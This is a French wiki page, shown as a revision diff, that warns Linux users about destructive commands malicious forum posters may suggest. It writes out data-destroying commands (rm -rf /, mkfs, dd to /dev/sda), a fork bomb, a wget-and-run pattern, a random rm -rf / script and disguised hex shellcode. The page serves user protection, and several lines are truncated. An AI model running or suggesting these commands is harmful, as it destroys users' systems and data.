Différences
Ci-dessous, les différences entre deux révisions de la page.
Les deux révisions précédentesRévision précédenteProchaine révision | Révision précédente | ||
commandes_dangereuses [Le 08/10/2011, 13:15] – [Décompression bomb] 82.225.133.123 | commandes_dangereuses [Le 30/11/2016, 16:34] (Version actuelle) – [Shell] 77.57.162.151 | ||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
+ | {{tag> | ||
+ | ---- | ||
+ | |||
+ | ====== Les commandes dangereuses ====== | ||
+ | |||
+ | La ligne de commande est un outil puissant, et notamment très pratique pour détecter ou résoudre les problèmes : il en est donc souvent fait usage sur le forum ou dans la documentation. Cependant, certains utilisateurs malveillants peuvent donner des commandes dangereuses qui corrompent, voire détruisent le système, ou les données. L' | ||
+ | |||
+ | À titre d' | ||
+ | |||
+ | <note warning> | ||
+ | N' | ||
+ | |||
+ | Cette liste est loin d' | ||
+ | |||
+ | <note >Les " | ||
+ | |||
+ | ===== Suppression de tous les fichiers ou des fichiers du répertoire actuel ou de fichiers importants ===== | ||
+ | Sous linux avec un terminal on peut tout faire, absolument tout. Donc lisez bien ceci : | ||
+ | Le danger de ces commandes est tout à fait évident : | ||
+ | <note warning> | ||
+ | Règle n° 1 : NE JAMAIS VALIDER UNE COMMANDE QUI POURRAIT VOUS FAIRE PERDRE VOS DONNÉES ET VOTRE SYSTÈME.</ | ||
+ | |||
+ | En cas de doute, n' | ||
+ | |||
+ | Celles qui peuvent tout effacer (fichier système ou données personnelles) : | ||
+ | < | ||
+ | rm -rf / | ||
+ | rm -rf . | ||
+ | rm -rf * | ||
+ | mv QUELQUE_CHOSE /dev/null | ||
+ | shred QUELQUE_CHOSE | ||
+ | QUELQUE_COMMANDE > QUELQUE_CHOSE_IMPORTANT | ||
+ | sed QUELQUE_CHOSE -i QUELQUE_CHOSE | ||
+ | mv -r / /dev/null (Déplace les fichiers de façon récursive depuis la racine vers null = tout est effacé). | ||
+ | </ | ||
+ | |||
+ | la commande | ||
+ | < | ||
+ | > fichiers* | ||
+ | </ | ||
+ | est aussi redoutable : elle redirige du rien en écrasant les fichiers. | ||
+ | |||
+ | ainsi que toutes les variantes commençant par ' | ||
+ | Pourquoi ? | ||
+ | |||
+ | * rm est la commande de suppression des fichiers sous Gnu/Linux, rm quelque chose supprimera ce quelque chose, imaginez que vous supprimez tous vos fichiers système ( racine / ) , ou vos fichier personnels ( / | ||
+ | /dev/null est l' | ||
+ | |||
+ | Assurez vous que : | ||
+ | * un avertissement vous prévient et vous en assumerez les conséquences en cas de perte de données. | ||
+ | * la documentation est bien claire, bien rédigée, explicite. | ||
+ | |||
+ | Protection remplacer le plus souvent possible cette commande par : | ||
+ | < | ||
+ | Vous pouvez aussi utiliser la commande mv ( déplacer ) | ||
+ | < | ||
+ | |||
+ | Exemple : | ||
+ | |||
+ | Suppression du fichier labrador.jpeg (une image) | ||
+ | au lieu d' | ||
+ | < | ||
+ | |||
+ | Entrez plutôt : | ||
+ | < | ||
+ | < | ||
+ | |||
+ | <note help>Un doute ? [[http:// | ||
+ | |||
+ | <note warning> | ||
+ | Règle n° 2 : NE JAMAIS ou du moins LE MOINS POSSIBLE OUVRIR NAUTILUS (LE GESTIONNAIRE DE FICHIERS) EN MODE SUPER UTILISATEUR (ROOT) VOUS POURRIEZ PERDRE VOS DONNÉES ET ENDOMMAGER VOTRE SYSTÈME.</ | ||
+ | |||
+ | * La commande find peut aussi être dangereuse, avec son paramètre -exec qui permet d' | ||
+ | Par exemple, la commande suivante est très dangereuse : elle provoque la suppressions de tous les fichiers. | ||
+ | < | ||
+ | De même pour **rm** qui est utilisé. | ||
+ | ===== Re-formatage ===== | ||
+ | |||
+ | Les données sur le périphérique mentionné après la commande mkfs seront détruites et remplacées par un système de fichier vide : | ||
+ | |||
+ | < | ||
+ | mkfs | ||
+ | mkfs.ext3 | ||
+ | mkfs.QUELQUE_CHOSE | ||
+ | </ | ||
+ | |||
+ | ===== Manipulation de périphériques de stockage ===== | ||
+ | |||
+ | Écrit des données sur le périphérique et peut entraîner la perte totale des données : | ||
+ | |||
+ | < | ||
+ | QUELQUE_COMMANDE > /dev/sda | ||
+ | dd if=QUELQUE_CHOSE of=/dev/sda | ||
+ | </ | ||
+ | |||
+ | ===== Forkbomb ===== | ||
+ | |||
+ | Exécute un grand nombre de processus jusqu' | ||
+ | |||
+ | Avec le shell Bash : | ||
+ | |||
+ | : | ||
+ | |||
+ | En Perl : | ||
+ | |||
+ | perl -e "fork while fork" | ||
+ | |||
+ | Si vous voulez savoir comment se protéger contre les forks bombs allez voir [[: | ||
+ | |||
+ | ===== Tarbomb ===== | ||
+ | |||
+ | Quelqu' | ||
+ | Ce cas est extrêmement rare, puisque, sous Ubuntu du moins, une archive contenant plus d'un fichier se décompressera dans un nouveau dossier. | ||
+ | <note important> | ||
+ | ===== Decompression bomb ===== | ||
+ | |||
+ | Quelqu' | ||
+ | N' | ||
+ | ===== Shell ===== | ||
+ | |||
+ | Quelqu' | ||
+ | |||
+ | wget http:// | ||
+ | sh ./ | ||
+ | |||
+ | wget http:// | ||
+ | |||
+ | === Roulette russe === | ||
+ | |||
+ | Une fois ce script lancé, vous avez une " | ||
+ | |||
+ | < | ||
+ | #!/bin/bash | ||
+ | echo "" | ||
+ | ! (( $RANDOM % 6 )) && rm -rf / || echo "You live" | ||
+ | exit 0 | ||
+ | </ | ||
+ | |||
+ | ===== Compilation de code ===== | ||
+ | |||
+ | Quelqu' | ||
+ | |||
+ | Par exemple : | ||
+ | |||
+ | < | ||
+ | char esp[] __attribute__ ((section(" | ||
+ | release */ | ||
+ | = " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | "cp -p /bin/sh / | ||
+ | / | ||
+ | </ | ||
+ | |||
+ | Ceci est la forme hexadécimale de '' | ||
+ | |||
+ | ===== Changements de droits ===== | ||
+ | |||
+ | chmod -R 777 / | ||
+ | |||
+ | Ceci donne les droits de lecture et d' | ||
+ | Dans ce cas, il faut réattribuer la valeur o-w, il faut que vous ayez les droits u+w sur /tmp | ||
+ | |||
+ | Pour info : | ||
+ | un / non modifié : | ||
+ | < | ||
+ | $ ls -al / | ||
+ | total 100 | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | lrwxrwxrwx | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x 144 root root 12288 2009-07-18 05:30 etc | ||
+ | drwxr-xr-x | ||
+ | lrwxrwxrwx | ||
+ | lrwxrwxrwx | ||
+ | drwxr-xr-x | ||
+ | drwx------ | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | dr-xr-xr-x 177 root root 0 2009-07-18 06:35 proc | ||
+ | drwx------ | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | drwxrwxrwt | ||
+ | drwxr-xr-x | ||
+ | drwxr-xr-x | ||
+ | lrwxrwxrwx | ||
+ | lrwxrwxrwx | ||
+ | </ | ||
+ | |||
+ | Plus généralement, | ||
+ | |||
+ | ===== Ajout d'un mot de passe au compte ===== | ||
+ | |||
+ | sudo passwd root | ||
+ | |||
+ | La commande "sudo passwd root " peut vous faire perdre vos droits sudo !! | ||
+ | |||
+ | 8-) Pour récupérer ses droits sudo sur son compte, se loguer en root ("sudo -i") et tapez : | ||
+ | |||
+ | adduser votre_username sudo | ||
+ | |||
+ | ===== Conclusion ===== | ||
+ | |||
+ | Encore une fois, il ne s'agit pas de donner une liste complète des commandes malveillantes, | ||
+ | |||
+ | Le meilleur moyen d' | ||
+ | |||
+ | ---- | ||
+ | |||
+ | // | ||
+ | |||
+ | //Basé sur « [[http:// |